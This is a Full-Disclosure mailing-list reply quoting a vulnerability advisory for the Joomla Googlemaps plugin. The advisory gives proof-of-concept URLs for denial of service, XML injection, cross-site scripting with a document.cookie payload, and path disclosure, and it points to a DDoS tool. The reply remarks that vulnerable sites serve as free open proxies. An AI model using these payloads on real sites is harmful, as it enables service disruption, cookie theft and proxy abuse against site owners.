Ah, and as a side effect, you get a bunch of free HTTP proxies -- the script will fetch and print anything. Just to fix up the content type, but this should not be an issue.
Finally, something useful. I leave the google dork as an exercise for the reader. Cheers, Z. 2013/7/16 MustLive <[email protected]> > Hello list! > > These are Denial of Service, XML Injection, Cross-Site Scripting and Full > path disclosure vulnerabilities in Googlemaps plugin for Joomla. > > ------------------------- > Affected products: > ------------------------- > > Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and > potentially previous versions. In new version of DAVOSET I'll add a lot of > web sites with Googlemaps plugin. > > ------------------------- > Affected vendors: > ------------------------- > > Mike Reumer > http://extensions.joomla.org/**extensions/maps-a-weather/** > maps-a-locations/maps/1147<http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147> > > ---------- > Details: > ---------- > > Denial of Service (WASC-10): > > http://site/plugins/content/**plugin_googlemap2_proxy.php?** > url=site2/large_file<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file> > > Besides conducting DoS attack manually, it's also possible to conduct > automated DoS and DDoS attacks with using of DAVOSET ( > http://lists.webappsec.org/**pipermail/websecurity_lists.** > webappsec.org/2013-June/**008850.html<http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html> > ). > > XML Injection (WASC-23): > > http://site/plugins/content/**plugin_googlemap2_proxy.php?** > url=site2/xml.xml<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml> > > It's possible to include external xml-files. Which also can be used for > XSS attack: > > XSS via XML Injection (WASC-23): > > http://site/plugins/content/**plugin_googlemap2_proxy.php?** > url=site2/xss.xml<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml> > > File xss.xml: > > <?xml version="1.0" encoding="utf-8"?> > <feed> > <title>XSS</title> > <entry> > <div xmlns="http://www.w3.org/1999/**xhtml <http://www.w3.org/1999/xhtml> > "><script>alert(document.**cookie)</script></div> > </entry> > </feed> > > Cross-Site Scripting (WASC-08): > > http://site/plugins/content/**plugin_googlemap2_proxy.php?** > url=%3Cbody%20onload=alert(**document.cookie)%3E<http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E> > > Full path disclosure (WASC-13): > > http://site/plugins/content/**plugin_googlemap2_proxy.php<http://site/plugins/content/plugin_googlemap2_proxy.php> > > Besides plugin_googlemap2_proxy.php, also happens > plugin_googlemap3_proxy.php (but it has other path at web sites). > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > http://websecurity.com.ua > > ______________________________**_________________ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-**disclosure-charter.html<http://lists.grok.org.uk/full-disclosure-charter.html> > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
